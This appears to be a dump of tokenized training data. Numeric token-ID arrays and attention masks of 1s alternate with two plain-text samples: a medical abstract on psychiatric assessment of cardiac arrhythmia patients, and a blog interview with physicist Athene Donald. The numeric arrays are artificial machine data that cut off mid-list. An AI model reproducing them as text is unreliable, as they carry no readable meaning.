12092, 1135, 393, 297, 393, 306, 3282, 29915, 29873, 864, 304, 26556, 5923, 1819, 297, 278, 716, 29918, 791, 1746, 297, 278, 2441, 1591, 565, 727, 471, 694, 995, 297, 278, 1746, 297, 278, 2767, 1591, 577, 278, 1095, 1121, 2869, 5148, 763, 445, 29901, 13, 13, 14474, 1591, 29896, 13, 13, 10490, 13, 13, 1482, 29918, 791, 353, 1591, 29906, 29889, 1482, 29918, 791, 13, 13, 21482, 13, 13, 29898, 6404, 282, 29895, 29918, 1949, 29892, 716, 29918, 791, 13, 13, 21482, 1591, 29906, 13, 13, 22043, 716, 29918, 791, 8519, 6058, 1870, 29897, 3339, 1591, 29906, 13, 13, 22043, 13, 13, 2371, 29896, 29889, 20571, 29918, 1949, 353, 1591, 29906, 29889, 20571, 29918, 1949, 13, 13, 29950, 2300, 445, 6911, 4856, 29889, 306, 1073, 445, 338, 5051, 6996, 6433, 29892, 541, 746, 366, 526, 925, 6257, 411, 323, 29899, 4176, 470, 29892, 763, 592, 29892, 526, 671, 304, 1985, 411, 6449, 3631, 470, 1203, 7769, 287, 8720, 10276, 967, 29915, 29879, 2898, 304, 7945, 596, 17294, 304, 1348, 297, 22001, 763, 1014, 339, 6358, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Psychiatric assessment of patients with life-threatening cardiac arrhythmias. This article describes the development of a protocol specifically designed for the psychiatric assessment of patients with life-threatening ventricular arrhythmias. Psychiatric assessment occurs in the context of a team approach in which the cardiologist has a pivotal role. Initial findings and one-year follow-up data on the first twenty-five patients evaluated psychiatrically are presented. Findings tend to confirm that psychiatric complaints are common on initial assessment and suggest that patients with life-threatening ventricular arrhythmias who do not use the psychological mechanism of denial and volunteer psychological complaints may constitute a subgroup of patients who would be more amenable to psychiatric intervention compared to those denying psychological complaints at initial psychiatric interview. Psychiatrists and associated professionals should become more involved with patients with life-threatening cardiac arrhythmias.
[ 1, 16777, 7163, 2200, 24809, 358, 310, 22069, 411, 2834, 29899, 386, 276, 2579, 292, 5881, 13544, 3948, 29882, 1541, 2460, 294, 29889, 13, 4013, 4274, 16612, 278, 5849, 310, 263, 9608, 10816, 8688, 363, 278, 11643, 7163, 2200, 24809, 358, 310, 22069, 411, 2834, 29899, 386, 276, 2579, 292, 9712, 2200, 1070, 3948, 29882, 1541, 2460, 294, 29889, 16777, 7163, 2200, 24809, 358, 10008, 297, 278, 3030, 310, 263, 3815, 2948, 297, 607, 278, 5881, 29875, 19915, 756, 263, 282, 440, 7288, 6297, 29889, 17250, 1284, 886, 322, 697, 29899, 6360, 1101, 29899, 786, 848, 373, 278, 937, 10081, 29899, 20818, 22069, 19030, 11643, 7163, 29878, 1711, 526, 9132, 29889, 10987, 886, 10331, 304, 9659, 393, 11643, 7163, 2200, 15313, 9466, 526, 3619, 373, 2847, 24809, 358, 322, 4368, 393, 22069, 411, 2834, 29899, 386, 276, 2579, 292, 9712, 2200, 1070, 3948, 29882, 1541, 2460, 294, 1058, 437, 451, 671, 278, 11643, 5996, 13336, 310, 972, 616, 322, 27886, 261, 11643, 5996, 15313, 9466, 1122, 1040, 12356, 263, 24410, 310, 22069, 1058, 723, 367, 901, 626, 12007, 304, 11643, 7163, 2200, 1006, 7316, 9401, 304, 1906, 972, 5414, 11643, 5996, 15313, 9466, 472, 2847, 11643, 7163, 2200, 15593, 29889, 16777, 7163, 2021, 29879, 322, 6942, 6351, 1338, 881, 4953, 901, 9701, 411, 22069, 411, 2834, 29899, 386, 276, 2579, 292, 5881, 13544, 3948, 29882, 1541, 2460, 294, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Saturday, 21 June 2014 In 2009, I helped a student-run publication to interview and photograph Professor Dame Athene Donald. When I embark on a (lifelong) project to learn about being creative and transforming our creativity into a reality, I strongly feel that her story of connecting her body of work is inspiring courage and creativity in others. In her office at the legendary Cavendish Laboratory in West Cambridge, she generously shared her insights (some are applicable to life) and hopes for our future creative generations, especially those who are interested in science, technology, engineering, and mathematics (STEM). ♥♥♥ In the 800th anniversary year of the University of Cambridge, Professor Athene Donald of the Cavendish Laboratory, has received the 2009 L'Oréal-UNESCO For Women in Science Award. The awards established by the cosmetics company L'Oreal jointly with UNESCO, on the premise that the world needs science ... science needs women, have annually celebrated the achievements of five leading women scientists - one scientist from each continent. Dubbed as the Nobel Prize for Women in Science, the award aims to change the perception of women in science. Could you please tell us about your scientific contributions which have led to your L'Oréal-UNESCO For Women in Science Award? Athene: "I found this a very difficult question, because I think it's a lot of different thing and it's the sum of all that I do. I have had a career where I have worked in lots of different area, and my strength is making connections between different fields. I have done lots of works in electron microscopy, developed a technique known as environmental scanning electron microscopy (ESEM) for samples which are traditionally very difficult to look at using an ordinary scanning electron microscope, which works in a vacuum. If you are looking at wet or biological samples, you have to do a lot of sample preparation first. ESEM allows you to look at biological materials without drying them out and killing them. We have also been looking at how native proteins stick together. When we deliberately denature proteins, they unfold and start to behave like synthetic polymers (plastics), which formed part of my earlier career. We use the ideas of polymer physics and apply them to biological materials. By moving from traditional physics to non-traditional areas, you open up a lot of new opportunities. One of the things that I am very proud of is that we used Small Angle X¬–ray scattering to study the starch granule. We developed a structural model for how the starch granules are put together, and at one point this was being taught at Part IB Plant Sciences. I thought it was wonderful to be able to bridge into a different discipline!" How do you nurture inter-disciplinary collaborations? Athene: "Within the university, we have a lot of brilliant people. One of the challenges is finding someone to spend some time talking to you to the point that they understand what you are saying and vice versa. Sitting in committees with different people has helped to find new contacts. It takes time to do inter-disciplinary work. A key thing in my inter-disciplinary work is finding people who you like, who share ways of thinking about the world, and who are prepared to commit the necessary time." Athene is also the director of a newly-established Physics of Medicine Initiative in the University. She continued, "We try to bring physicists, biologists, and clinicians together. The traditional medical physics discipline is aimed at developing techniques, such as MRI and ultrasound, and to apply them in clinics. That's what I would refer to as Medical Physics, and is not what we are doing. We intend to take a different set of tools to solve biological problems, for example to use lasers to deform cells in order to distinguish healthy from cancerous cells. This is one step back from the clinic, but will give us a profound insight into what is going on. This is rather different from traditional medical physics. It is harder to find clinicians than scientists, who are willing to share what they need with us." Her secret is to be constantly innovative. "I have never stayed working in a single area for very long. I always started working in a new area before I drop one. For me, I have never wanted to know absolutely everything about a very small area. I am much more interested in taking a broad approach.It's risky. Sometimes I am not always successful, but that way you get new ideas and new challenges. I started researching starch in 1986, it went on for 20 years, and now I am not working on it at all. Knowing when to stop is important. Now, I am working on proteins, cells, and also photovoltaics. My projects tend to have about a ten-year lifespan. We take a technique, start off in a very simple system, and then make it more complex." How can we attract more female students to pursue science? Athene: "The first challenge is in school. Science is not a very popular subject, it seems hard and people don't know what it can be used for in a career. The second challenge is not to lose women at the later stages, when you are 25 and upwards. You talk to up and coming female researchers, who ask how can I manage to have a family and an academic career? You don't necessarily get your permanent position until you are in your 30s. There are too many people out there saying you can't do it. We need to counter that view, and there are many different ways of achieving your goals. If you want to be an academic scientist, it's very hard work, you probably have to give up other things like much of a social life, but it's not impossible." How do you combine family and work? Athene shared, "my family is very important to me. My husband is a mathematician, so we can understand each other’s science up to a point. My husband has been fantastically supportive. As a woman and a scientist, you really need a supportive partner. My husband actually stopped his career, he became the primary carer. Not every couple will find that solution acceptable, you have to find the right solution for you, and that's going to vary for everyone." On renewable energy, Athene thinks that we need to do a better job in researching on energy, because the world is going to have problems if scientists can't solve that. If we don't solve the energy crisis, we may end up having to go back to living in something like Victorian-time conditions. In the next ten years, Athene will continue to use microscopy and microrheology (a non-invasive technique to analyze the visco-elastic properties of complex fluids) for understanding particle diffusion in cellular systems. At the time of this interview (200902), Athene and her collaborators, Viji Draviam at the Department of Genetics in the University of Cambridge, have just begun a project to make patterns on which to stick cells and to investigate on how the patterns affect cell divisions and the implications in cancer.
[ 1, 24211, 29892, 29871, 29906, 29896, 5306, 29871, 29906, 29900, 29896, 29946, 13, 13, 797, 29871, 29906, 29900, 29900, 29929, 29892, 306, 9213, 263, 8368, 29899, 3389, 17745, 304, 15593, 322, 17739, 11386, 360, 420, 9193, 1600, 18935, 29889, 1932, 306, 7232, 935, 373, 263, 313, 29880, 361, 295, 549, 29897, 2060, 304, 5110, 1048, 1641, 907, 1230, 322, 4327, 292, 1749, 907, 28157, 964, 263, 16832, 29892, 306, 13818, 4459, 393, 902, 5828, 310, 16791, 902, 3573, 310, 664, 338, 8681, 8491, 19872, 322, 907, 28157, 297, 4045, 29889, 13, 13, 797, 902, 8034, 472, 278, 15983, 653, 20354, 355, 728, 16715, 7606, 297, 3122, 12585, 29892, 1183, 1176, 5794, 7258, 902, 1663, 5861, 313, 5372, 526, 22903, 304, 2834, 29897, 322, 26926, 363, 1749, 5434, 907, 1230, 1176, 800, 29892, 7148, 1906, 1058, 526, 8852, 297, 10466, 29892, 15483, 29892, 21639, 29892, 322, 23964, 313, 1254, 12665, 467, 13, 13, 30922, 30922, 30922, 13, 13, 797, 278, 29871, 29947, 29900, 29900, 386, 6957, 27547, 1629, 310, 278, 3014, 310, 12585, 29892, 11386, 9193, 1600, 18935, 310, 278, 20354, 355, 728, 16715, 7606, 29892, 756, 4520, 278, 29871, 29906, 29900, 29900, 29929, 365, 29915, 2816, 21659, 29899, 3904, 2890, 3217, 1152, 10152, 297, 9327, 7526, 29889, 450, 24441, 7841, 491, 278, 6776, 2527, 1199, 5001, 365, 29915, 29949, 6370, 14002, 368, 411, 8291, 2890, 3217, 29892, 373, 278, 5188, 895, 393, 278, 3186, 4225, 10466, 2023, 10466, 4225, 5866, 29892, 505, 2889, 1474, 26301, 278, 27012, 4110, 310, 5320, 8236, 5866, 9638, 2879, 448, 697, 9638, 391, 515, 1269, 25523, 29889, 11668, 2580, 408, 278, 27813, 20604, 363, 10152, 297, 9327, 29892, 278, 9862, 263, 9893, 304, 1735, 278, 639, 1441, 310, 5866, 297, 10466, 29889, 13, 13, 23323, 366, 3113, 2649, 502, 1048, 596, 16021, 20706, 607, 505, 5331, 304, 596, 365, 29915, 2816, 21659, 29899, 3904, 2890, 3217, 1152, 10152, 297, 9327, 7526, 29973, 13, 29909, 386, 1600, 29901, 376, 29902, 1476, 445, 263, 1407, 5189, 1139, 29892, 1363, 306, 1348, 372, 29915, 29879, 263, 3287, 310, 1422, 2655, 322, 372, 29915, 29879, 278, 2533, 310, 599, 393, 306, 437, 29889, 306, 505, 750, 263, 6413, 988, 306, 505, 3796, 297, 14568, 310, 1422, 4038, 29892, 322, 590, 9324, 338, 3907, 12368, 1546, 1422, 4235, 29889, 13, 13, 29902, 505, 2309, 14568, 310, 1736, 297, 11966, 9200, 1557, 2270, 29892, 8906, 263, 11043, 2998, 408, 29380, 885, 9450, 11966, 9200, 1557, 2270, 313, 29923, 1660, 29924, 29897, 363, 11916, 607, 526, 11399, 635, 1407, 5189, 304, 1106, 472, 773, 385, 15311, 885, 9450, 11966, 20710, 1883, 4338, 29892, 607, 1736, 297, 263, 11757, 29884, 398, 29889, 960, 366, 526, 3063, 472, 7990, 470, 4768, 5996, 11916, 29892, 366, 505, 304, 437, 263, 3287, 310, 4559, 10223, 362, 937, 29889, 382, 1660, 29924, 6511, 366, 304, 1106, 472, 4768, 5996, 17279, 1728, 15589, 292, 963, 714, 322, 23393, 963, 29889, 13, 13, 4806, 505, 884, 1063, 3063, 472, 920, 7531, 3279, 1144, 12070, 4208, 29889, 1932, 591, 23663, 2486, 972, 1535, 3279, 1144, 29892, 896, 20220, 322, 1369, 304, 23389, 763, 14710, 7492, 24324, 414, 313, 572, 579, 1199, 511, 607, 8429, 760, 310, 590, 8859, 6413, 29889, 1334, 671, 278, 7014, 310, 24324, 261, 17558, 322, 3394, 963, 304, 4768, 5996, 17279, 29889, 13, 13, 2059, 8401, 515, 13807, 17558, 304, 1661, 29899, 29576, 3245, 10161, 29892, 366, 1722, 701, 263, 3287, 310, 716, 28602, 1907, 29889, 3118, 310, 278, 2712, 393, 306, 626, 1407, 22314, 310, 338, 393, 591, 1304, 18285, 3218, 280, 1060, 30320, 29994, 764, 14801, 292, 304, 6559, 278, 380, 1279, 3803, 1297, 29889, 1334, 8906, 263, 2281, 3631, 1904, 363, 920, 278, 380, 1279, 3803, 2540, 526, 1925, 4208, 29892, 322, 472, 697, 1298, 445, 471, 1641, 16187, 472, 3455, 15731, 18058, 17253, 29889, 306, 2714, 372, 471, 20695, 304, 367, 2221, 304, 12945, 964, 263, 1422, 29822, 3850, 13, 13, 5328, 437, 366, 302, 4227, 545, 1006, 29899, 2218, 13326, 3821, 11465, 800, 29973, 13, 13, 29909, 386, 1600, 29901, 376, 3047, 262, 278, 16372, 29892, 591, 505, 263, 3287, 310, 27592, 2305, 29889, 3118, 310, 278, 18066, 267, 338, 9138, 4856, 304, 18864, 777, 931, 9963, 304, 366, 304, 278, 1298, 393, 896, 2274, 825, 366, 526, 5934, 322, 11289, 1224, 29874, 29889, 317, 5367, 297, 844, 5388, 267, 411, 1422, 2305, 756, 9213, 304, 1284, 716, 25957, 29889, 739, 4893, 931, 304, 437, 1006, 29899, 2218, 13326, 3821, 664, 29889, 319, 1820, 2655, 297, 590, 1006, 29899, 2218, 13326, 3821, 664, 338, 9138, 2305, 1058, 366, 763, 29892, 1058, 6232, 5837, 310, 7291, 1048, 278, 3186, 29892, 322, 1058, 526, 13240, 304, 9063, 278, 5181, 931, 1213, 13, 13, 29909, 386, 1600, 338, 884, 278, 8881, 310, 263, 15141, 29899, 342, 370, 3726, 29837, 310, 27529, 512, 4812, 1230, 297, 278, 3014, 29889, 2296, 7572, 29892, 376, 4806, 1018, 304, 6963, 4824, 293, 2879, 29892, 4768, 1189, 2879, 29892, 322, 24899, 14722, 4208, 29889, 450, 13807, 16083, 17558, 29822, 338, 12242, 287, 472, 14338, 13698, 29892, 1316, 408, 341, 3960, 322, 9238, 10678, 618, 29892, 322, 304, 3394, 963, 297, 24899, 1199, 29889, 2193, 29915, 29879, 825, 306, 723, 2737, 304, 408, 20795, 29837, 29892, 322, 338, 451, 825, 591, 526, 2599, 29889, 13, 13, 4806, 24042, 304, 2125, 263, 1422, 731, 310, 8492, 304, 4505, 4768, 5996, 4828, 29892, 363, 1342, 304, 671, 1869, 414, 304, 316, 689, 9101, 297, 1797, 304, 20820, 9045, 29891, 515, 23900, 681, 9101, 29889, 910, 338, 697, 4331, 1250, 515, 278, 24899, 293, 29892, 541, 674, 2367, 502, 263, 2600, 618, 25483, 964, 825, 338, 2675, 373, 29889, 910, 338, 3265, 1422, 515, 13807, 16083, 17558, 29889, 739, 338, 22622, 304, 1284, 24899, 14722, 1135, 9638, 2879, 29892, 1058, 526, 17762, 304, 6232, 825, 896, 817, 411, 502, 1213, 13, 13, 18650, 7035, 338, 304, 367, 21003, 24233, 1230, 29889, 13, 13, 29908, 29902, 505, 2360, 27661, 1985, 297, 263, 2323, 4038, 363, 1407, 1472, 29889, 306, 2337, 4687, 1985, 297, 263, 716, 4038, 1434, 306, 5768, 697, 29889, 1152, 592, 29892, 306, 505, 2360, 5131, 304, 1073, 13312, 4129, 1048, 263, 1407, 2319, 4038, 29889, 306, 626, 1568, 901, 8852, 297, 5622, 263, 7300, 2948, 29889, 3112, 29915, 29879, 5161, 3459, 29889, 13, 13, 29903, 14618, 306, 626, 451, 2337, 9150, 29892, 541, 393, 982, 366, 679, 716, 7014, 322, 716, 18066, 267, 29889, 306, 4687, 5925, 292, 380, 1279, 297, 29871, 29896, 29929, 29947, 29953, 29892, 372, 3512, 373, 363, 29871, 29906, 29900, 2440, 29892, 322, 1286, 306, 626, 451, 1985, 373, 372, 472, 599, 29889, 13, 13, 29968, 3707, 292, 746, 304, 5040, 338, 4100, 29889, 2567, 29892, 306, 626, 1985, 373, 3279, 1144, 29892, 9101, 29892, 322, 884, 6731, 586, 26481, 1199, 29889, 1619, 9279, 10331, 304, 505, 1048, 263, 3006, 29899, 6360, 11747, 267, 8357, 29889, 1334, 2125, 263, 11043, 29892, 1369, 1283, 297, 263, 1407, 2560, 1788, 29892, 322, 769, 1207, 372, 901, 4280, 1213, 13, 13, 5328, 508, 591, 13978, 901, 12944, 8041, 304, 12359, 434, 10466, 29973, 13, 13, 29909, 386, 1600, 29901, 376, 1576, 937, 18766, 338, 297, 3762, 29889, 9327, 338, 451, 263, 1407, 5972, 4967, 29892, 372, 2444, 2898, 322, 2305, 1016, 29915, 29873, 1073, 825, 372, 508, 367, 1304, 363, 297, 263, 6413, 29889, 13, 13, 1576, 1473, 18766, 338, 451, 304, 14074, 5866, 472, 278, 2678, 22950, 29892, 746, 366, 526, 29871, 29906, 29945, 322, 701, 2935, 29889, 887, 5193, 304, 701, 322, 6421, 12944, 5925, 414, 29892, 1058, 2244, 920, 508, 306, 10933, 304, 505, 263, 3942, 322, 385, 21567, 6413, 29973, 13, 13, 3492, 1016, 29915, 29873, 12695, 679, 596, 17667, 2602, 2745, 366, 526, 297, 596, 29871, 29941, 29900, 29879, 29889, 1670, 526, 2086, 1784, 2305, 714, 727, 5934, 366, 508, 29915, 29873, 437, 372, 29889, 13, 13, 4806, 817, 304, 6795, 393, 1776, 29892, 322, 727, 526, 1784, 1422, 5837, 310, 3657, 15387, 596, 14433, 29889, 960, 366, 864, 304, 367, 385, 21567, 9638, 391, 29892, 372, 29915, 29879, 1407, 2898, 664, 29892, 366, 3117, 505, 304, 2367, 701, 916, 2712, 763, 1568, 310, 263, 5264, 2834, 29892, 541, 372, 29915, 29879, 451, 9301, 1213, 13, 13, 5328, 437, 366, 14405, 3942, 322, 664, 29973, 13, 13, 29909, 386, 1600, 7258, 29892, 376, 1357, 3942, 338, 1407, 4100, 304, 592, 29889, 1619, 10216, 338, 263, 5844, 19217, 713, 29892, 577, 591, 508, 2274, 1269, 916, 30010, 29879, 10466, 701, 304, 263, 1298, 29889, 1619, 10216, 756, 1063, 13568, 579, 1711, 2304, 573, 29889, 13, 13, 2887, 263, 6114, 322, 263, 9638, 391, 29892, 366, 2289, 817, 263, 2304, 573, 18096, 29889, 1619, 10216, 2869, 11084, 670, 6413, 29892, 540, 3897, 278, 7601, 1559, 261, 29889, 2216, 1432, 7303, 674, 1284, 393, 1650, 22691, 29892, 366, 505, 304, 1284, 278, 1492, 1650, 363, 366, 29892, 322, 393, 29915, 29879, 2675, 304, 13100, 363, 14332, 1213, 13, 13, 2951, 23011, 519, 5864, 29892, 9193, 1600, 22405, 393, 591, 817, 304, 437, 263, 2253, 4982, 297, 5925, 292, 373, 5864, 29892, 1363, 278, 3186, 338, 2675, 304, 505, 4828, 565, 9638, 2879, 508, 29915, 29873, 4505, 393, 29889, 960, 591, 1016, 29915, 29873, 4505, 278, 5864, 24161, 29892, 591, 1122, 1095, 701, 2534, 304, 748, 1250, 304, 8471, 297, 1554, 763, 12684, 713, 29899, 2230, 5855, 29889, 13, 13, 797, 278, 2446, 3006, 2440, 29892, 9193, 1600, 674, 6773, 304, 671, 9200, 1557, 2270, 322, 20710, 729, 354, 3002, 313, 29874, 1661, 29899, 262, 4428, 573, 11043, 304, 27599, 278, 1998, 1111, 29899, 295, 6288, 4426, 310, 4280, 20501, 4841, 29897, 363, 8004, 16445, 23253, 297, 3038, 1070, 6757, 29889, 13, 13, 4178, 278, 931, 310, 445, 15593, 313, 29906, 29900, 29900, 29929, 29900, 29906, 511, 9193, 1600, 322, 902, 11465, 4097, 29892, 478, 13188, 16322, 1403, 314, 472, 278, 10317, 310, 5739, 300, 1199, 297, 278, 3014, 310, 12585, 29892, 505, 925, 23580, 263, 2060, 304, 1207, 15038, 373, 607, 304, 12070, 9101, 322, 304, 23033, 373, 920, 278, 15038, 6602, 3038, 25884, 322, 278, 2411, 5795, 297, 23900, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 